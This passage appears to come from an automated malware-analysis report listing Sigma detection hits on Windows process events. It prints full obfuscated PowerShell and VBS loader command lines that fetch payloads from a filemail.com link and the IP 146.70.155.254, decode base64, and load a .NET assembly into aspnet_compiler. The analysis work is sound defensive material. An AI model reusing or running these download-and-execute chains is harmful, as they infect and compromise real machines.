'+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , ProcessId: 8044, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3Rl
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICA
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe, ProcessId: 7772, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" , ProcessId: 8044, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = 